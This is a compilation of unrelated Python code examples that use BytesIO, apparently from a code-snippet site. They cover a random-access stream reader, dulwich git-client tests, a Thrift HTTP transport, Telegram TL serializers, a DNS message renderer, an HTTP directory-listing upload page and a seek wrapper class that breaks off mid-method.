class BufferedRandomReader:
    """Create random-access, read-only buffered stream adapter from a sequential
    input stream which does not support random access (i.e., ```seek()```)

    Example::

        >>> stream = BufferedRandomReader(BytesIO(b'abc'))
        >>> stream.read(2)
        b'ab'
        >>> stream.seek(0)
        0
        >>> stream.read()
        b'abc'

    """
    def __init__(self, fin, chunk_size=512):
        self._fin = fin
        self._buf = BytesIO()
        self._eof = False
        self._chunk_size = chunk_size

    def tell(self):
        return self._buf.tell()

    def read(self, n=-1):
        """Read at most ``n`` bytes from the file (less if the ```read``` hits
        end-of-file before obtaining size bytes).

        If ``n`` argument is negative or omitted, read all data until end of
        file is reached. The bytes are returned as a string object. An empty
        string is returned when end of file is encountered immediately.
        """
        pos = self._buf.tell()
        end = self._buf.seek(0, SEEK_END)

        if n < 0:
            if not self._eof:
                self._buf.write(self._fin.read())
                self._eof = True
        else:
            req = pos + n - end

            if req > 0 and not self._eof:  # need to grow
                bcount = _align_up(req, self._chunk_size)
                bytes = self._fin.read(bcount)

                self._buf.write(bytes)
                self._eof = len(bytes) < bcount

        self._buf.seek(pos)

        return self._buf.read(n)

    def seek(self, offset, whence=SEEK_SET):

        if whence == SEEK_END:
            if not self._eof:
                self._buf.seek(0, SEEK_END)
                self._buf.write(self._fin.read())
                self._eof = True
            return self._buf.seek(offset, SEEK_END)

        return self._buf.seek(offset, whence)

    def close(self):
        self._fin.close()
        self._buf.close()
Example #33
class GitClientTests(TestCase):

    def setUp(self):
        super(GitClientTests, self).setUp()
        self.rout = BytesIO()
        self.rin = BytesIO()
        self.client = DummyClient(lambda x: True, self.rin.read,
                                  self.rout.write)

    def test_caps(self):
        agent_cap = (
            'agent=dulwich/%d.%d.%d' % dulwich.__version__).encode('ascii')
        self.assertEqual(set([b'multi_ack', b'side-band-64k', b'ofs-delta',
                              b'thin-pack', b'multi_ack_detailed', b'shallow',
                              agent_cap]),
                         set(self.client._fetch_capabilities))
        self.assertEqual(
            set([b'delete-refs', b'ofs-delta', b'report-status',
                 b'side-band-64k', agent_cap]),
            set(self.client._send_capabilities))

    def test_archive_ack(self):
        self.rin.write(
            b'0009NACK\n'
            b'0000')
        self.rin.seek(0)
        self.client.archive(b'bla', b'HEAD', None, None)
        self.assertEqual(self.rout.getvalue(), b'0011argument HEAD0000')

    def test_fetch_empty(self):
        self.rin.write(b'0000')
        self.rin.seek(0)

        def check_heads(heads):
            self.assertEqual(heads, {})
            return []
        ret = self.client.fetch_pack(b'/', check_heads, None, None)
        self.assertEqual({}, ret.refs)
        self.assertEqual({}, ret.symrefs)

    def test_fetch_pack_ignores_magic_ref(self):
        self.rin.write(
            b'00000000000000000000000000000000000000000000 capabilities^{}'
            b'\x00 multi_ack '
            b'thin-pack side-band side-band-64k ofs-delta shallow no-progress '
            b'include-tag\n'
            b'0000')
        self.rin.seek(0)

        def check_heads(heads):
            self.assertEqual({}, heads)
            return []
        ret = self.client.fetch_pack(b'bla', check_heads, None, None, None)
        self.assertEqual({}, ret.refs)
        self.assertEqual({}, ret.symrefs)
        self.assertEqual(self.rout.getvalue(), b'0000')

    def test_fetch_pack_none(self):
        self.rin.write(
            b'008855dcc6bf963f922e1ed5c4bbaaefcfacef57b1d7 HEAD\x00multi_ack '
            b'thin-pack side-band side-band-64k ofs-delta shallow no-progress '
            b'include-tag\n'
            b'0000')
        self.rin.seek(0)
        ret = self.client.fetch_pack(
                b'bla', lambda heads: [], None, None, None)
        self.assertEqual(
                {b'HEAD': b'55dcc6bf963f922e1ed5c4bbaaefcfacef57b1d7'},
                ret.refs)
        self.assertEqual({}, ret.symrefs)
        self.assertEqual(self.rout.getvalue(), b'0000')

    def test_send_pack_no_sideband64k_with_update_ref_error(self):
        # If the server doesn't report side-band-64k we shouldn't try to
        # parse side-band data
        pkts = [b'55dcc6bf963f922e1ed5c4bbaaefcfacef57b1d7 capabilities^{}'
                b'\x00 report-status delete-refs ofs-delta\n',
                b'',
                b"unpack ok",
                b"ng refs/foo/bar pre-receive hook declined",
                b'']
        for pkt in pkts:
            if pkt == b'':
                self.rin.write(b"0000")
            else:
                self.rin.write(("%04x" % (len(pkt)+4)).encode('ascii') + pkt)
        self.rin.seek(0)

        tree = Tree()
        commit = Commit()
        commit.tree = tree
        commit.parents = []
        commit.author = commit.committer = b'test user'
        commit.commit_time = commit.author_time = 1174773719
        commit.commit_timezone = commit.author_timezone = 0
        commit.encoding = b'UTF-8'
        commit.message = b'test message'

        def update_refs(refs):
            return {b'refs/foo/bar': commit.id, }

        def generate_pack_data(have, want, ofs_delta=False):
            return pack_objects_to_data([(commit, None), (tree, ''), ])

        result = self.client.send_pack("blah", update_refs, generate_pack_data)
        self.assertEqual(
            {b'refs/foo/bar': 'pre-receive hook declined'},
            result.ref_status)
        self.assertEqual({b'refs/foo/bar': commit.id}, result.refs)

    def test_send_pack_none(self):
        # Set ref to current value
        self.rin.write(
            b'0078310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00 report-status delete-refs '
            b'side-band-64k quiet ofs-delta\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {
                b'refs/heads/master':
                    b'310ca9477129b8586fa2afc779c1f57cf64bba6c'
            }

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(self.rout.getvalue(), b'0000')

    def test_send_pack_keep_and_delete(self):
        self.rin.write(
            b'0063310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00report-status delete-refs ofs-delta\n'
            b'003f310ca9477129b8586fa2afc779c1f57cf64bba6c refs/heads/keepme\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/master\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {b'refs/heads/master': b'0' * 40}

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'0000000000000000000000000000000000000000 '
            b'refs/heads/master\x00delete-refs ofs-delta report-status0000')

    def test_send_pack_delete_only(self):
        self.rin.write(
            b'0063310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00report-status delete-refs ofs-delta\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/master\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {b'refs/heads/master': b'0' * 40}

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'0000000000000000000000000000000000000000 '
            b'refs/heads/master\x00delete-refs ofs-delta report-status0000')

    def test_send_pack_new_ref_only(self):
        self.rin.write(
            b'0063310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00report-status delete-refs ofs-delta\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/blah12\n'
            b'0000')
        self.rin.seek(0)

        def update_refs(refs):
            return {
                b'refs/heads/blah12':
                b'310ca9477129b8586fa2afc779c1f57cf64bba6c',
                b'refs/heads/master':
                    b'310ca9477129b8586fa2afc779c1f57cf64bba6c'
            }

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        f = BytesIO()
        write_pack_objects(f, {})
        self.client.send_pack('/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b0000000000000000000000000000000000000000 '
            b'310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/blah12\x00delete-refs ofs-delta report-status0000' +
            f.getvalue())

    def test_send_pack_new_ref(self):
        self.rin.write(
            b'0064310ca9477129b8586fa2afc779c1f57cf64bba6c '
            b'refs/heads/master\x00 report-status delete-refs ofs-delta\n'
            b'0000000eunpack ok\n'
            b'0019ok refs/heads/blah12\n'
            b'0000')
        self.rin.seek(0)

        tree = Tree()
        commit = Commit()
        commit.tree = tree
        commit.parents = []
        commit.author = commit.committer = b'test user'
        commit.commit_time = commit.author_time = 1174773719
        commit.commit_timezone = commit.author_timezone = 0
        commit.encoding = b'UTF-8'
        commit.message = b'test message'

        def update_refs(refs):
            return {
                b'refs/heads/blah12': commit.id,
                b'refs/heads/master':
                    b'310ca9477129b8586fa2afc779c1f57cf64bba6c'
            }

        def generate_pack_data(have, want, ofs_delta=False):
            return pack_objects_to_data([(commit, None), (tree, b''), ])

        f = BytesIO()
        write_pack_data(f, *generate_pack_data(None, None))
        self.client.send_pack(b'/', update_refs, generate_pack_data)
        self.assertEqual(
            self.rout.getvalue(),
            b'008b0000000000000000000000000000000000000000 ' + commit.id +
            b' refs/heads/blah12\x00delete-refs ofs-delta report-status0000' +
            f.getvalue())

    def test_send_pack_no_deleteref_delete_only(self):
        pkts = [b'310ca9477129b8586fa2afc779c1f57cf64bba6c refs/heads/master'
                b'\x00 report-status ofs-delta\n',
                b'',
                b'']
        for pkt in pkts:
            if pkt == b'':
                self.rin.write(b"0000")
            else:
                self.rin.write(("%04x" % (len(pkt)+4)).encode('ascii') + pkt)
        self.rin.seek(0)

        def update_refs(refs):
            return {b'refs/heads/master': b'0' * 40}

        def generate_pack_data(have, want, ofs_delta=False):
            return 0, []

        result = self.client.send_pack(b"/", update_refs, generate_pack_data)
        self.assertEqual(
            result.ref_status,
            {b'refs/heads/master': 'remote does not support deleting refs'})
        self.assertEqual(
            result.refs,
            {b'refs/heads/master':
             b'310ca9477129b8586fa2afc779c1f57cf64bba6c'})
        self.assertEqual(self.rout.getvalue(), b'0000')
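The pkt-line framing these tests build by hand, as a minimal helper sketch: each packet is prefixed with the total length in hex (payload plus the 4 length digits), and b'0000' is the flush packet:

def pkt_line(payload):
    return ('%04x' % (len(payload) + 4)).encode('ascii') + payload

assert pkt_line(b'NACK\n') == b'0009NACK\n'
FLUSH = b'0000'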
Example #34
class THttpClient(TTransportBase):
    def __init__(self, uri_or_host, port=None, path=None):
        if port is not None:
            warnings.warn(
                "gunakan THttpClient di sini('http://host:port/path') syntax",
                DeprecationWarning,
                stacklevel=2)
            self.host = uri_or_host
            self.port = port
            assert path
            self.path = path
            self.scheme = 'http'
        else:
            parsed = urllib.parse.urlparse(uri_or_host)
            self.scheme = parsed.scheme
            assert self.scheme in ('http', 'https')
            if self.scheme == 'http':
                self.port = parsed.port or http_client.HTTP_PORT
            elif self.scheme == 'https':
                self.port = parsed.port or http_client.HTTPS_PORT
            self.host = parsed.hostname
            self.path = parsed.path
            if parsed.query:
                self.path += '?%s' % parsed.query
        proxy = None
        self.realhost = self.realport = self.proxy_auth = None
        self.__wbuf = BytesIO()
        self.__http = None
        self.__http_response = None
        self.__timeout = None
        self.__custom_headers = None
        self.__time = time.time()
        self.__loop = 0
    @staticmethod
    def basic_proxy_auth_header(proxy):
        if proxy is None or not proxy.username:
            return None
        ap = "%s:%s" % (urllib.parse.unquote(proxy.username),
                        urllib.parse.unquote(proxy.password))
        cr = base64.b64encode(ap.encode()).decode().strip()
        return "Basic " + cr
    def using_proxy(self):
        return self.realhost is not None
    def open(self):
        if self.scheme == 'http':
            self.__http = http_client.HTTPConnection(self.host, self.port)
        elif self.scheme == 'https':
            self.__http = http_client.HTTPSConnection(self.host, self.port)
    def close(self):
        self.__http.close()
        self.__http = None
        self.__http_response = None
    def isOpen(self):
        return self.__http is not None
    def setTimeout(self, ms):
        if not hasattr(socket, 'getdefaulttimeout'):
            raise NotImplementedError
        if ms is None:
            self.__timeout = None
        else:
            self.__timeout = ms / 1000.0
    def setCustomHeaders(self, headers):
        self.__custom_headers = headers
    def read(self, sz):
        return self.__http_response.read(sz)
    def write(self, buf):
        self.__wbuf.write(buf)
    def __withTimeout(f):
        def _f(*args, **kwargs):
            orig_timeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(args[0].__timeout)
            try:
                result = f(*args, **kwargs)
            finally:
                socket.setdefaulttimeout(orig_timeout)
            return result
        return _f
    def flush(self):
        if self.__loop <= 2:
            if self.isOpen(): self.close()
            self.open(); self.__loop += 1
        elif time.time() - self.__time > 90:
            self.close(); self.open(); self.__time = time.time()
        data = self.__wbuf.getvalue()
        self.__wbuf = BytesIO()
        self.__http.putrequest('POST', self.path)
        self.__http.putheader('Host', self.host)
        self.__http.putheader('Content-Type', 'application/x-thrift')
        self.__http.putheader('Content-Length', str(len(data)))
        if self.__custom_headers:
            for key, val in six.iteritems(self.__custom_headers):
                self.__http.putheader(key, val)
        self.__http.endheaders()
        self.__http.send(data)
        self.__http_response = self.__http.getresponse()
        self.code = self.__http_response.status
        self.message = self.__http_response.reason
        self.headers = self.__http_response.msg
Example #35
class Response(object):
    def __init__(self, binary_support, non_binary_content_type_prefixes):
        self.status_code = 500
        self.headers = []
        self.body = BytesIO()
        self.binary_support = binary_support
        self.non_binary_content_type_prefixes = non_binary_content_type_prefixes

    def start_response(self, status, response_headers, exc_info=None):
        if exc_info is not None:
            raise exc_info[0](exc_info[1]).with_traceback(exc_info[2])
        self.status_code = int(status.split()[0])
        self.headers.extend(response_headers)
        return self.body.write

    def consume(self, result):
        try:
            for data in result:
                if data:
                    self.body.write(data)
        finally:
            if hasattr(result, "close"):
                result.close()

    def as_apig_response(self):
        response = {
            "statusCode": self.status_code,
            "headers": dict(self.headers)
        }
        if self._should_send_binary():
            response["isBase64Encoded"] = True
            response["body"] = b64encode(self.body.getvalue()).decode("utf-8")
        else:
            response["body"] = self.body.getvalue().decode("utf-8")

        return response

    def _should_send_binary(self):
        """
        Determines if binary response should be sent to API Gateway
        """
        if not self.binary_support:
            return False

        content_type = self._get_content_type()
        if not content_type.startswith(self.non_binary_content_type_prefixes):
            return True

        content_encoding = self._get_content_encoding()
        # Content type is non-binary but the content encoding might be.
        return "gzip" in content_encoding.lower()

    def _get_content_type(self):
        return self._get_header("content-type") or ""

    def _get_content_encoding(self):
        return self._get_header("content-encoding") or ""

    def _get_header(self, header_name):
        header_name = header_name.lower()
        matching_headers = [
            v for k, v in self.headers if k.lower() == header_name
        ]
        if len(matching_headers):
            return matching_headers[-1]
        return None
Example #36
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.popup else 0
        flags |= (1 << 1) if self.inbox_date is not None else 0
        data.write(Int(flags))
        
        if self.inbox_date is not None:
            data.write(Int(self.inbox_date))
        
        data.write(String(self.type))
        
        data.write(String(self.message))
        
        data.write(self.media.write())
        
        data.write(Vector(self.entities))
        
        return data.getvalue()
Example #37
    def write(self) -> bytes:
        b = BytesIO()
        b.write(Int(self.ID, False))

        # No flags
        
        b.write(Int(self.pts))
        
        b.write(Int(self.qts))
        
        b.write(Int(self.date))
        
        b.write(Int(self.seq))
        
        b.write(Int(self.unread_count))
        
        return b.getvalue()
Example #38
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 0) if self.gallery else 0
        flags |= (1 << 1) if self.next_offset is not None else 0
        flags |= (1 << 2) if self.switch_pm is not None else 0
        data.write(Int(flags))

        data.write(Long(self.query_id))

        if self.next_offset is not None:
            data.write(String(self.next_offset))

        if self.switch_pm is not None:
            data.write(self.switch_pm.write())

        data.write(Vector(self.results))

        data.write(Int(self.cache_time))

        data.write(Vector(self.users))

        return data.getvalue()
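The flags convention shared by these TL write() methods, as a minimal sketch: each optional field sets one bit, so the reader knows which fields follow:

popup, inbox_date = True, None
flags = 0
flags |= (1 << 0) if popup else 0
flags |= (1 << 1) if inbox_date is not None else 0
assert flags == 1   # only the popup bit is set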
Example #39
class Renderer(object):
    """Helper class for building DNS wire-format messages.
    Most applications can use the higher-level L{thirdparty.dns.message.Message}
    class and its to_wire() method to generate wire-format messages.
    This class is for those applications which need finer control
    over the generation of messages.
    Typical use::
        r = thirdparty.dns.renderer.Renderer(id=1, flags=0x80, max_size=512)
        r.add_question(qname, qtype, qclass)
        r.add_rrset(thirdparty.dns.renderer.ANSWER, rrset_1)
        r.add_rrset(thirdparty.dns.renderer.ANSWER, rrset_2)
        r.add_rrset(thirdparty.dns.renderer.AUTHORITY, ns_rrset)
        r.add_edns(0, 0, 4096)
        r.add_rrset(thirdparty.dns.renderer.ADDITIONAL, ad_rrset_1)
        r.add_rrset(thirdparty.dns.renderer.ADDITIONAL, ad_rrset_2)
        r.write_header()
        r.add_tsig(keyname, secret, 300, 1, 0, '', request_mac)
        wire = r.get_wire()
    output: a BytesIO, where rendering is written
    id: the message id
    flags: the message flags
    max_size: the maximum size of the message
    origin: the origin to use when rendering relative names
    compress: the compression table
    section: an int, the section currently being rendered
    counts: list of the number of RRs in each section
    mac: the MAC of the rendered message (if TSIG was used)
    """

    def __init__(self, id=None, flags=0, max_size=65535, origin=None):
        """Initialize a new renderer."""

        self.output = BytesIO()
        if id is None:
            self.id = random.randint(0, 65535)
        else:
            self.id = id
        self.flags = flags
        self.max_size = max_size
        self.origin = origin
        self.compress = {}
        self.section = QUESTION
        self.counts = [0, 0, 0, 0]
        self.output.write(b'\x00' * 12)
        self.mac = ''

    def _rollback(self, where):
        """Truncate the output buffer at offset *where*, and remove any
        compression table entries that pointed beyond the truncation
        point.
        """

        self.output.seek(where)
        self.output.truncate()
        keys_to_delete = []
        for k, v in self.compress.items():
            if v >= where:
                keys_to_delete.append(k)
        for k in keys_to_delete:
            del self.compress[k]

    def _set_section(self, section):
        """Set the renderer's current section.
        Sections must be rendered order: QUESTION, ANSWER, AUTHORITY,
        ADDITIONAL.  Sections may be empty.
        Raises thirdparty.dns.exception.FormError if an attempt was made to set
        a section value less than the current section.
        """

        if self.section != section:
            if self.section > section:
                raise thirdparty.dns.exception.FormError
            self.section = section

    def add_question(self, qname, rdtype, rdclass=thirdparty.dns.rdataclass.IN):
        """Add a question to the message."""

        self._set_section(QUESTION)
        before = self.output.tell()
        qname.to_wire(self.output, self.compress, self.origin)
        self.output.write(struct.pack("!HH", rdtype, rdclass))
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[QUESTION] += 1

    def add_rrset(self, section, rrset, **kw):
        """Add the rrset to the specified section.
        Any keyword arguments are passed on to the rdataset's to_wire()
        routine.
        """

        self._set_section(section)
        before = self.output.tell()
        n = rrset.to_wire(self.output, self.compress, self.origin, **kw)
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[section] += n

    def add_rdataset(self, section, name, rdataset, **kw):
        """Add the rdataset to the specified section, using the specified
        name as the owner name.
        Any keyword arguments are passed on to the rdataset's to_wire()
        routine.
        """

        self._set_section(section)
        before = self.output.tell()
        n = rdataset.to_wire(name, self.output, self.compress, self.origin,
                             **kw)
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[section] += n

    def add_edns(self, edns, ednsflags, payload, options=None):
        """Add an EDNS OPT record to the message."""

        # make sure the EDNS version in ednsflags agrees with edns
        ednsflags &= 0xFF00FFFF
        ednsflags |= (edns << 16)
        self._set_section(ADDITIONAL)
        before = self.output.tell()
        self.output.write(struct.pack('!BHHIH', 0, thirdparty.dns.rdatatype.OPT, payload,
                                      ednsflags, 0))
        if options is not None:
            lstart = self.output.tell()
            for opt in options:
                stuff = struct.pack("!HH", opt.otype, 0)
                self.output.write(stuff)
                start = self.output.tell()
                opt.to_wire(self.output)
                end = self.output.tell()
                assert end - start < 65536
                self.output.seek(start - 2)
                stuff = struct.pack("!H", end - start)
                self.output.write(stuff)
                self.output.seek(0, 2)
            lend = self.output.tell()
            assert lend - lstart < 65536
            self.output.seek(lstart - 2)
            stuff = struct.pack("!H", lend - lstart)
            self.output.write(stuff)
            self.output.seek(0, 2)
        after = self.output.tell()
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig
        self.counts[ADDITIONAL] += 1

    def add_tsig(self, keyname, secret, fudge, id, tsig_error, other_data,
                 request_mac, algorithm=thirdparty.dns.tsig.default_algorithm):
        """Add a TSIG signature to the message."""

        s = self.output.getvalue()
        (tsig_rdata, self.mac, ctx) = thirdparty.dns.tsig.sign(s,
                                                    keyname,
                                                    secret,
                                                    int(time.time()),
                                                    fudge,
                                                    id,
                                                    tsig_error,
                                                    other_data,
                                                    request_mac,
                                                    algorithm=algorithm)
        self._write_tsig(tsig_rdata, keyname)

    def add_multi_tsig(self, ctx, keyname, secret, fudge, id, tsig_error,
                       other_data, request_mac,
                       algorithm=thirdparty.dns.tsig.default_algorithm):
        """Add a TSIG signature to the message. Unlike add_tsig(), this can be
        used for a series of consecutive DNS envelopes, e.g. for a zone
        transfer over TCP [RFC2845, 4.4].
        For the first message in the sequence, give ctx=None. For each
        subsequent message, give the ctx that was returned from the
        add_multi_tsig() call for the previous message."""

        s = self.output.getvalue()
        (tsig_rdata, self.mac, ctx) = thirdparty.dns.tsig.sign(s,
                                                    keyname,
                                                    secret,
                                                    int(time.time()),
                                                    fudge,
                                                    id,
                                                    tsig_error,
                                                    other_data,
                                                    request_mac,
                                                    ctx=ctx,
                                                    first=ctx is None,
                                                    multi=True,
                                                    algorithm=algorithm)
        self._write_tsig(tsig_rdata, keyname)
        return ctx

    def _write_tsig(self, tsig_rdata, keyname):
        self._set_section(ADDITIONAL)
        before = self.output.tell()

        keyname.to_wire(self.output, self.compress, self.origin)
        self.output.write(struct.pack('!HHIH', thirdparty.dns.rdatatype.TSIG,
                                      thirdparty.dns.rdataclass.ANY, 0, 0))
        rdata_start = self.output.tell()
        self.output.write(tsig_rdata)

        after = self.output.tell()
        assert after - rdata_start < 65536
        if after >= self.max_size:
            self._rollback(before)
            raise thirdparty.dns.exception.TooBig

        self.output.seek(rdata_start - 2)
        self.output.write(struct.pack('!H', after - rdata_start))
        self.counts[ADDITIONAL] += 1
        self.output.seek(10)
        self.output.write(struct.pack('!H', self.counts[ADDITIONAL]))
        self.output.seek(0, 2)

    def write_header(self):
        """Write the DNS message header.
        Writing the DNS message header is done after all sections
        have been rendered, but before the optional TSIG signature
        is added.
        """

        self.output.seek(0)
        self.output.write(struct.pack('!HHHHHH', self.id, self.flags,
                                      self.counts[0], self.counts[1],
                                      self.counts[2], self.counts[3]))
        self.output.seek(0, 2)

    def get_wire(self):
        """Return the wire format message."""

        return self.output.getvalue()
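
A minimal usage sketch of the renderer above (assumptions: the class is the module's Renderer, and the vendored thirdparty.dns package exposes dnspython's usual name and rdatatype modules):

# Sketch under the assumptions stated above, not part of the original snippet.
import thirdparty.dns.name
import thirdparty.dns.rdatatype

r = Renderer(id=1, flags=0x0100)                    # 0x0100 sets the RD bit
qname = thirdparty.dns.name.from_text('example.com')
r.add_question(qname, thirdparty.dns.rdatatype.A)   # counts[QUESTION] becomes 1
r.write_header()                                    # backpatch id, flags and counts
wire = r.get_wire()                                 # wire-format bytes, ready to send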
Exemple #40
0
    def list_directory(self, path):
        """Helper to produce a directory listing (absent index.html).

        Return value is either a file object, or None (indicating an
        error).  In either case, the headers are sent, making the
        interface the same as for send_head().

        """
        try:
            list = os.listdir(path)
        except os.error:
            self.send_error(404, "No permission to list directory")
            return None
        list.sort(key=lambda a: a.lower())
        f = BytesIO()
        displaypath = cgi.escape(urllib.parse.unquote(self.path))
        f.write(b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
        f.write(("<html>\n<title>SuperTransfer json Upload %s</title>\n" %
                 displaypath).encode())
        f.write(b"<body>\n<h2>SuperTransfer Config</h2>\n")
        f.write(b"<h4>Upload Your Gsuite Service Account Json Keys Here.</h2>")
        f.write(
            b"<a href='https://rclone.org/drive/#service-account-support'>Click Here For Instructions</a>"
        )
        f.write(b"<hr>\n")
        f.write(b"<form ENCTYPE=\"multipart/form-data\" method=\"post\">")
        f.write(b"<input name=\"file\" type=\"file\"/>")
        f.write(b"<input type=\"submit\" value=\"upload\"/></form>\n")
        f.write(b"<hr>\n<ul>\n")
        for name in list:
            fullname = os.path.join(path, name)
            displayname = linkname = name
            # Append / for directories or @ for symbolic links
            if os.path.isdir(fullname):
                displayname = name + "/"
                linkname = name + "/"
            if os.path.islink(fullname):
                displayname = name + "@"
                # Note: a link to a directory displays with @ and links with /
            f.write(('<li><a href="%s">%s</a>\n' %
                     (urllib.parse.quote(linkname),
                      cgi.escape(displayname))).encode())
        f.write(b"</ul>\n<hr>\n</body>\n</html>\n")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        return f
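
For reference, a caller in the same handler streams the returned buffer and closes it, as SimpleHTTPRequestHandler.do_GET() does (a sketch; it assumes the handler inherits copyfile):

f = self.list_directory(path)
if f:
    self.copyfile(f, self.wfile)   # headers were already sent by list_directory
    f.close()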
Exemple #41
0
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 1) if self.title is not None else 0
        flags |= (1 << 2) if self.description is not None else 0
        data.write(Int(flags))

        data.write(String(self.id))

        data.write(String(self.type))

        if self.title is not None:
            data.write(String(self.title))

        if self.description is not None:
            data.write(String(self.description))

        data.write(self.document.write())

        data.write(self.send_message.write())

        return data.getvalue()
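
The flags word above follows the TL conditional-field convention: bit n is set exactly when the optional field gated by flags.n is present, and the reader decodes fields in the same order. A standalone illustration of the idiom (plain Python, not Pyrogram API):

title, description = "hello", None
flags = 0
flags |= (1 << 1) if title is not None else 0
flags |= (1 << 2) if description is not None else 0
assert flags & (1 << 1)         # bit 1 set: title present
assert not (flags & (1 << 2))   # bit 2 clear: description absent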
Exemple #42
0
class seek_wrapper:
	"""Adds a seek method to a file object.

	This is only designed for seeking on readonly file-like objects.

	Wrapped file-like object must have a read method.  The readline method is
	only supported if that method is present on the wrapped object.  The
	readlines method is always supported.  xreadlines and iteration are
	supported only for Python 2.2 and above.

	Public attributes:

	wrapped: the wrapped file object
	is_closed: true iff .close() has been called

	WARNING: All other attributes of the wrapped object (i.e. those that are not
	one of wrapped, read, readline, readlines, xreadlines, __iter__ and next)
	are passed through unaltered, which may or may not make sense for your
	particular file object.

	"""

	# General strategy is to check that cache is full enough, then delegate to
	# the cache (self.__cache, which is a BytesIO instance).  A seek
	# position (self.__pos) is maintained independently of the cache, in order
	# that a single cache may be shared between multiple seek_wrapper objects.
	# Copying using module copy shares the cache in this way.

	def __init__(self, wrapped):
		self.wrapped = wrapped
		self.__read_complete_state = [False]
		self.__is_closed_state = [False]
		self.__have_readline = hasattr(self.wrapped, "readline")
		self.__cache = BytesIO()
		self.__pos = 0  # seek position

	def invariant(self):
		# The end of the cache is always at the same place as the end of the
		# wrapped file (though the .tell() method is not required to be present
		# on wrapped file).
		return self.wrapped.tell() == len(self.__cache.getvalue())

	def close(self):
		self.wrapped.close()
		self.is_closed = True

	def __getattr__(self, name):
		if name == "is_closed":
			return self.__is_closed_state[0]
		elif name == "read_complete":
			return self.__read_complete_state[0]

		wrapped = self.__dict__.get("wrapped")
		if wrapped:
			return getattr(wrapped, name)

		return getattr(self.__class__, name)

	def __setattr__(self, name, value):
		if name == "is_closed":
			self.__is_closed_state[0] = bool(value)
		elif name == "read_complete":
			if not self.is_closed:
				self.__read_complete_state[0] = bool(value)
		else:
			self.__dict__[name] = value

	def seek(self, offset, whence=0):
		assert whence in [0, 1, 2]

		# how much data, if any, do we need to read?
		if whence == 2:  # 2: relative to end of *wrapped* file
			if offset < 0:
				raise ValueError("negative seek offset")
			# since we don't know yet where the end of that file is, we must
			# read everything
			to_read = None
		else:
			if whence == 0:  # 0: absolute
				if offset < 0:
					raise ValueError("negative seek offset")
				dest = offset
			else:  # 1: relative to current position
				pos = self.__pos
				if pos + offset < 0:
					raise ValueError("seek to before start of file")
				dest = pos + offset
			end = len_of_seekable(self.__cache)
			to_read = dest - end
			if to_read < 0:
				to_read = 0

		if to_read != 0:
			self.__cache.seek(0, 2)
			if to_read is None:
				assert whence == 2
				self.__cache.write(self.wrapped.read())
				self.read_complete = True
				self.__pos = self.__cache.tell() - offset
			else:
				data = self.wrapped.read(to_read)
				if not data:
					self.read_complete = True
				else:
					self.__cache.write(data)
				# Don't raise an exception even if we've seek()ed past the end
				# of .wrapped, since fseek() doesn't complain in that case.
				# Also like fseek(), pretend we have seek()ed past the end,
				# i.e. not:
				# self.__pos = self.__cache.tell()
				# but rather:
				self.__pos = dest
		else:
			self.__pos = dest

	def tell(self):
		return self.__pos

	def __copy__(self):
		cpy = self.__class__(self.wrapped)
		cpy.__cache = self.__cache
		cpy.__read_complete_state = self.__read_complete_state
		cpy.__is_closed_state = self.__is_closed_state
		return cpy

	def get_data(self):
		pos = self.__pos
		try:
			self.seek(0)
			return self.read(-1)
		finally:
			self.__pos = pos

	def read(self, size=-1):
		pos = self.__pos
		end = len_of_seekable(self.__cache)
		available = end - pos

		# enough data already cached?
		if size <= available and size != -1:
			self.__cache.seek(pos)
			self.__pos = pos + size
			return self.__cache.read(size)

		# no, so read sufficient data from wrapped file and cache it
		self.__cache.seek(0, 2)
		if size == -1:
			self.__cache.write(self.wrapped.read())
			self.read_complete = True
		else:
			to_read = size - available
			assert to_read > 0
			data = self.wrapped.read(to_read)
			if not data:
				self.read_complete = True
			else:
				self.__cache.write(data)
		self.__cache.seek(pos)

		data = self.__cache.read(size)
		self.__pos = self.__cache.tell()
		assert self.__pos == pos + len(data)
		return data

	def readline(self, size=-1):
		if not self.__have_readline:
			raise NotImplementedError("no readline method on wrapped object")

		# line we're about to read might not be complete in the cache, so
		# read another line first
		pos = self.__pos
		self.__cache.seek(0, 2)
		data = self.wrapped.readline()
		if not data:
			self.read_complete = True
		else:
